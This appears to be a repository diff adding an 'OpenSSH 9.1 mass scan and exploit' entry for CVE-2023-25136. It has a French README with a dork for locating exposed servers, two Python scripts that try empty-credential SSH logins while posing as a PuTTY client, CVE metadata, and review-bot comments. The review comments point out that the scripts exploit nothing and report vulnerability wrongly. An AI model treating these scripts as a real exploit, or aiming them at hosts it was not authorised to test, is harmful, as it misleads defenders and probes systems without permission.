diff --git a/cve/openssh/2023/CVE-2023-25136/README.md b/cve/openssh/2023/CVE-2023-25136/README.md
new file mode 100644
index 0000000000000000000000000000000000000000..787262094c4847f4a7fd308b626b07f3b2c661b4
--- /dev/null
+++ b/cve/openssh/2023/CVE-2023-25136/README.md
@@ -0,0 +1,38 @@
+# CVE-2023-25136
+OpenSSH 9.1 vulnerability mass scan and exploit
+
+# Détails sur la vulnérabilité
+
+Pour rappel, OpenSSH est un logiciel qui implémente le protocole SSH, très fréquemment utilisé pour se connecter à des machines sous Linux (ou Windows) de façon sécurisée pour effectuer de l'administration à distance.
+
+Introduit dans OpenSSH 9.1, la faille de sécurité CVE-2023-25136 affecte le processus de pré-authentification de SSH. En l'exploitant, un attaquant pourrait corrompre la mémoire et parvenir à exécuter du code arbitraire sur la machine, sans être authentifié sur le serveur cible.
+
+# utilisation
+
+Exécuter le script au choix ``scan de liste d'adresses IP`` où ``exploitation direct d'une IP vulnérable``
+
+# requirements
+
+• paramiko : pour l'installer il suffit de taper
+``pip install paramiko``
+
+• pyfiglet : pour l'installer il suffit de taper
+``pip install pyfiglet``
+
+• termcolor : pour l'installer il suffit de taper
+``pip install termcolor``
+
+# Dork
+
+Use Criminal IP
+
+Dork : ``SSH-2.0_OpenSSH_9.1``
+
+# More
+
+Plus de détails sur la vulnérabilité
+# Website
+
+https://christbowel.ml
+
+CTF player 💥 | Bug hunter 💻 | apprenti pentester 🎭
diff --git a/cve/openssh/2023/CVE-2023-25136/openssh-9_1-single_exploit.py b/cve/openssh/2023/CVE-2023-25136/openssh-9_1-single_exploit.py
new file mode 100644
index 0000000000000000000000000000000000000000..4e9bd219d98fb647bc9bd0ab69032d11af997687
--- /dev/null
+++ b/cve/openssh/2023/CVE-2023-25136/openssh-9_1-single_exploit.py
@@ -0,0 +1,20 @@
+import paramiko
+import pyfiglet
+
+ascii_text = pyfiglet.figlet_format("openssh 9.1", font="starwars")
+ascii_text += "\n\033[38;2;255;153;51m\033[2m✨💥by christbowel🎭💻\033[0m"
+print(ascii_text)
+
+print ("")
+
+target_ip = input("Entrer l'adresse ip a exploiter: ")
+CLIENT_ID = "PuTTY_Release_0.64"
+
+def main():
+ transport = paramiko.Transport(target_ip)
+ transport.local_version = f"SSH-2.0-{CLIENT_ID}"
+ transport.connect(username='', password='')
+
+if __name__ == "__main__":
+ main()
+
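Review bot: `main()` opens a `paramiko.Transport` and never closes it, and the result of `transport.connect(username='', password='')` is neither caught nor reported, so any failure surfaces as an unhandled paramiko traceback and the socket is left to interpreter teardown. Wrapping the call as `try: transport.connect(username='', password='')` followed by `finally: transport.close()` fixes the leak. `target_ip` is read with `input()` at module scope, so merely importing the file prints the banner and prompts; moving the prompt inside `main()` keeps the module free of side effects. A module docstring stating that the script connects with the client version string `SSH-2.0-PuTTY_Release_0.64` and empty credentials would tell an operator, and anyone reading sshd logs afterwards, what traffic to expect from it.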
diff --git a/cve/openssh/2023/CVE-2023-25136/openssh-9_1.py b/cve/openssh/2023/CVE-2023-25136/openssh-9_1.py
new file mode 100644
index 0000000000000000000000000000000000000000..9e6a1cb2272b34a680fc619ef64f2fd3b9e16466
--- /dev/null
+++ b/cve/openssh/2023/CVE-2023-25136/openssh-9_1.py
@@ -0,0 +1,37 @@
+import paramiko
+import socket
+from termcolor import colored
+import pyfiglet
+
+ascii_text = pyfiglet.figlet_format("openssh 9.1", font="starwars")
+ascii_text += "\n\033[38;2;255;153;51m\033[2m✨💥by christbowel🎭💻\033[0m"
+print(ascii_text)
+
+print ("")
+
+ip_file = input("Entrer la liste d'adresse ip a tester 🔥 : ")
+
+client_id = "PuTTY_Release_0.64"
+
+def check_ssh_vulnerability(ip):
+ try:
+ transport = paramiko.Transport(ip, timeout=1)
+
+ transport.local_version = f"SSH-2.0-{client_id}"
+
+ transport.connect(username='', password='')
+
+ print(colored(f"{ip}: Vulnérable", 'green'))
+
+ transport.close()
+
+ except (socket.error, paramiko.AuthenticationException, paramiko.SSHException):
+
+ print(colored(f"{ip}: Non vulnérable", 'red'))
+
+
+with open(ip_file, 'r') as f:
+ for line in f:
+ ip = line.strip()
+ check_ssh_vulnerability(ip)
+
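Review bot: The verdict in `check_ssh_vulnerability` depends on whether authentication with an empty username and password succeeds, which says nothing about the sshd version. A 9.1 server that rejects the login is printed as `Non vulnérable`, and so is every unreachable or timed-out host, because `socket.error` shares a handler with `paramiko.AuthenticationException`. Anyone using this output for patch triage gets false assurance; report connection failures separately, e.g. `except socket.error: print(colored(f"{ip}: Injoignable", 'yellow'))`, and treat the server banner in `transport.remote_version` as the (indicative) signal for the affected 9.1 release. As far as I can tell `paramiko.Transport.__init__` accepts no `timeout` keyword, so `paramiko.Transport(ip, timeout=1)` would raise an uncaught `TypeError` on the first address; confirm this against the paramiko version in use. `transport.close()` also runs only on the success path, and blank lines in the input file are passed through as addresses.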
diff --git a/cve/openssh/2023/yaml/CVE-2023-25136.yaml b/cve/openssh/2023/yaml/CVE-2023-25136.yaml
new file mode 100644
index 0000000000000000000000000000000000000000..1c97cf2e2210d68a7c9e8df60c6bf6c75ff0707b
--- /dev/null
+++ b/cve/openssh/2023/yaml/CVE-2023-25136.yaml
@@ -0,0 +1,19 @@
+id: CVE-2023-25136
+source: https://github.com/Christbowel/CVE-2023-25136
+info:
+ name: OpenSSH is the premier connectivity tool for remote login with the SSH protocol. It encrypts all traffic to eliminate eavesdropping, connection hijacking, and other attacks. In addition, OpenSSH provides a large suite of secure tunneling capabilities, several authentication methods, and sophisticated configuration options.
+ severity: medium
+ description:
+ OpenSSH server (sshd) 9.1 introduced a double-free vulnerability during options.kex_algorithms handling. This is fixed in OpenSSH 9.2. The double free can be leveraged, by an unauthenticated remote attacker in the default configuration, to jump to any location in the sshd address space. One third-party report states "remote code execution is theoretically possible."
+ scope-of-influence:
+ openssh 9.1
+ reference:
+ - https://nvd.nist.gov/vuln/detail/cve-2023-25136
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:H
+ cvss-score: 6.5
+ cve-id: CVE-2023-25136
+ cwe-id: CWE-415
+ cnvd-id: None
+ kve-id: None
+ tags: openssh, cve-2023
\ No newline at end of file
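Review bot: `info.name` holds a paragraph describing the OpenSSH product rather than a name for this entry, so any index or report built from `name` will not identify the issue. A short title such as `name: OpenSSH 9.1 sshd pre-authentication double free` matches what `description` states. `cnvd-id: None` and `kve-id: None` parse as the string `None` in YAML rather than null; if absence is meant, `null` or `~` is unambiguous, though check what the repository's consumers expect first. The file also ends without a trailing newline.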
diff --git a/other_list.yaml b/other_list.yaml
index 516c3adcfb636c223957496aa015901a0b61ef07..db7f750a313c4a6bb62135dd5e063a4ebec099f0 100644
--- a/other_list.yaml
+++ b/other_list.yaml
@@ -22,4 +22,6 @@ cve:
- CVE-2021-1056
java-spring-cloud-gateway:
- CVE-2022-22947
+ openssh:
+ - CVE-2023-25136
cnvd: